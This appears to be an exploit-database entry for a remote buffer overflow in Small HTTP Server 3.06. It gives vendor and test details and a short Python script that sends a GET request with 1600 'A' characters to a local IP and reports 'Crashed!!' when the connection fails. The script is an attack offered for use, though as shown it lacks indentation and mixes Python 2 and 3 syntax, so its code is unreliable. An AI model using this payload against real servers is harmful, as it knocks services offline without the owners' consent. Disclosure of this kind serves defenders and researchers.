Small HTTP Server version 3.06 suffers from a remote buffer overflow vulnerability.
2263af4ce6ff37dbac253b84a65217cf2d09048893a98db44c043759d40d98da
# Exploit Title: Small HTTP Server Remote Buffer Overflow
# Discovered by: Yehia Elghaly
# Discovered Date: 2022-04-07
# Vendor Homepage: http://smallsrv.com/
# Software Link : http://smallsrv.com/shttps_mgi.exe
# Tested Version: 3.06
# Vulnerability Type: Buffer Overflow Remote
# Tested on OS: Windows XP SP3 - Windows 7 Professional x86 SP1
# Description: Small HTTP Server 3.06 Long GET Remote Buffer Overflow
#!/usr/bin/env python
from requests.exceptions import ConnectionError
from requests.compat import urljoin, quote_plus
import requests as req
try:
url = "http://192.168.1.99"
term = "A" * 1600
evilb = urljoin(url, quote_plus(term))
resp = req.request(method='GET', url=evilb)
print(resp.text)
except ConnectionError as e:
print "Crashed!!"